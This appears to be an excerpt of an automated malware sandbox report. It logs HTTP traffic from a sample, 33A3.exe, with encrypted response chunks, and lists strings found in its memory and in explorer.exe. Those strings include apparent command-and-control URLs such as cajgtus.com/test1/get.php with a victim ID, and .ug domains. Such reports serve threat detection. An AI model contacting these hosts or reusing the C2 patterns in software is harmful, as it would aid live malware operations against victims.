Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Fri, 24 May 2024 15:38:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Fri, 24 May 2024 15:38:42 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Fri, 24 May 2024 15:38:46 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 35 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 90 51 10 25 01 f1 a0 89 b3 bf 05 ab 11 df 76 be 59 51 96 01 bf ea 26 ed 65 5e 12 b3 f2 92 4a f5 04 0d 0a 30 0d 0a 0d 0a Data Ascii: 35I:82OQ%vYQ&e^J0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Fri, 24 May 2024 15:38:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 66 0d 0a 04 00 ed 98 a4 08 a8 37 33 7c 09 c7 22 84 f6 82 af 73 32 f3 a2 68 33 54 27 c3 83 be 8e 99 1e a2 08 c9 63 a5 53 63 97 09 f8 ea 22 e5 38 69 15 b9 e0 9e 0f a2 17 c9 02 94 a7 7a d4 60 a6 bc 8d 14 3b 84 c3 3f 44 88 dd ca 0a 86 89 a2 0c bd 74 0d 0a 30 0d 0a 0d 0a Data Ascii: 4f73|"s2h3T'cSc"8iz`;?Dt0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Fri, 24 May 2024 15:38:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Fri, 24 May 2024 15:38:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Fri, 24 May 2024 15:38:57 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 32 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 89 43 14 78 1d e4 a3 8f ba a8 15 ea 1f d1 6f f8 62 7a b9 35 e3 e8 2d e9 3f 46 50 b9 e1 d9 0d 0a 30 0d 0a 0d 0a Data Ascii: 32I:82OCxobz5-?FP0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Fri, 24 May 2024 15:38:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Fri, 24 May 2024 15:39:03 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Fri, 24 May 2024 15:39:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Fri, 24 May 2024 15:39:05 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Fri, 24 May 2024 15:39:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Fri, 24 May 2024 15:39:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 37 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 98 d6 08 5e 39 5c a2 f3 df fc fc 48 eb 0b db 69 f9 53 47 91 0d 0a 30 0d 0a 0d 0a Data Ascii: 27I:82O^9\HiSG0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Fri, 24 May 2024 15:39:19 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3a 47 a4 e8 dd e1 e4 40 f0 4f 91 64 b2 45 48 95 01 bf ec 31 e5 0d 0a 30 0d 0a 0d 0a Data Ascii: 2cI:82OI:G@OdEH10
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Fri, 24 May 2024 15:39:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 31 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc ab 15 b0 08 db 6f a7 18 5c 9b 08 bf eb 3b af 2d 50 0a f3 dd c6 5b ee 52 c6 41 83 aa 76 d2 26 eb b2 c7 18 7e 0d 0a 30 0d 0a 0d 0a Data Ascii: 41I:82OTeo\;-P[RAv&~0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Fri, 24 May 2024 15:39:29 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 34 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 de 15 49 39 41 a3 e8 dd e1 f8 5f f5 4a 89 2d bb 53 51 90 4a fb ef 2c f3 2b 42 1a ae b7 d9 57 e8 0d 0a 30 0d 0a 0d 0a Data Ascii: 34I:82OI9A_J-SQJ,+BW0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Fri, 24 May 2024 15:39:35 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 63 31 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 84 42 09 25 16 f9 b5 8f bd b8 15 a5 0c ce 2c b4 59 52 db 04 e5 fd 28 e3 22 58 1b b2 ed cf 00 bc 53 da 46 d4 f7 20 86 24 e6 ad 90 52 23 e5 b4 4c 2b f8 a5 b4 6a f6 99 bc 5d af 72 94 cb 32 45 5d 39 0f 4e df a1 3d fd d4 55 84 ac c8 42 c6 36 9d 95 69 77 64 f9 7a 3a 9c c6 9d c6 76 ed 39 08 84 5a b0 4d e3 e6 d3 36 81 c7 fc 3f d7 38 f9 fb 91 e0 01 83 c4 c3 4c 1c c3 03 ae eb b4 c0 a9 ac 4f 1c ff 74 88 d8 29 82 7b 32 45 b6 88 f9 b7 ae 1a b1 4b 64 c0 c6 ba e2 d9 ba 78 d6 27 35 60 3a 6a e8 81 03 9d 78 ab a8 af 2d 90 d6 d7 44 0d 0a 30 0d 0a 0d 0a Data Ascii: c1I:82OB%,YR("XSF $R#L+j]r2E]9N=UB6iwdz:v9ZM6?8LOt){2EKdx'5`:jx-D0
Source: explorer.exe, 00000002.00000000.2049221866.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2049221866.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3004817424.00000000083C6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3009500853.00000000083C6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.3263362552.00000000083C3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3013299726.00000000083C6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3014031027.00000000083C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: 33A3.exe, 00000010.00000002.3253450343.0000000000748000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cajgtus.com/test1/get.php
Source: 33A3.exe, 00000010.00000002.3253450343.0000000000708000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 00000010.00000002.3253450343.0000000000790000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cajgtus.com/test1/get.php?pid=903E7F261711F85395E5CEFBF4173C54
Source: 33A3.exe, 00000010.00000002.3253450343.0000000000790000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cajgtus.com/test1/get.php?pid=903E7F261711F85395E5CEFBF4173C54-D
Source: 33A3.exe, 00000010.00000002.3253450343.0000000000790000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cajgtus.com/test1/get.php?pid=903E7F261711F85395E5CEFBF4173C54KS
Source: 33A3.exe, 00000010.00000002.3253450343.0000000000790000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cajgtus.com/test1/get.php?pid=903E7F261711F85395E5CEFBF4173C54L
Source: 33A3.exe, 00000010.00000002.3253450343.0000000000790000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cajgtus.com/test1/get.php?pid=903E7F261711F85395E5CEFBF4173C54e
Source: 33A3.exe, 00000010.00000002.3253450343.0000000000748000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cajgtus.com/test1/get.phpw
Source: explorer.exe, 00000002.00000000.2046328419.0000000000F13000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.v
Source: explorer.exe, 00000002.00000000.2049221866.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2049221866.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3004817424.00000000083C6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3009500853.00000000083C6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.3263362552.00000000083C3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3013299726.00000000083C6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3014031027.00000000083C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000002.00000000.2049221866.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2049221866.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3004817424.00000000083C6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3009500853.00000000083C6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.3263362552.00000000083C3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3013299726.00000000083C6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3014031027.00000000083C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: 33A3.exe, 00000008.00000002.2396691282.0000000004A00000.00000040.00001000.00020000.00000000.sdmp, 33A3.exe, 00000009.00000002.2422576325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 33A3.exe, 0000000D.00000002.2433122057.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, 33A3.exe, 0000000E.00000002.2442763090.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 33A3.exe, 0000000F.00000002.2446025490.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, 33A3.exe, 00000010.00000002.3250613248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 33A3.exe, 00000016.00000002.2530314082.0000000004A00000.00000040.00001000.00020000.00000000.sdmp, 33A3.exe, 00000017.00000002.2541887297.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 33A3.exe, 00000019.00000002.2617025690.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, 33A3.exe, 0000001A.00000002.2629001294.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error
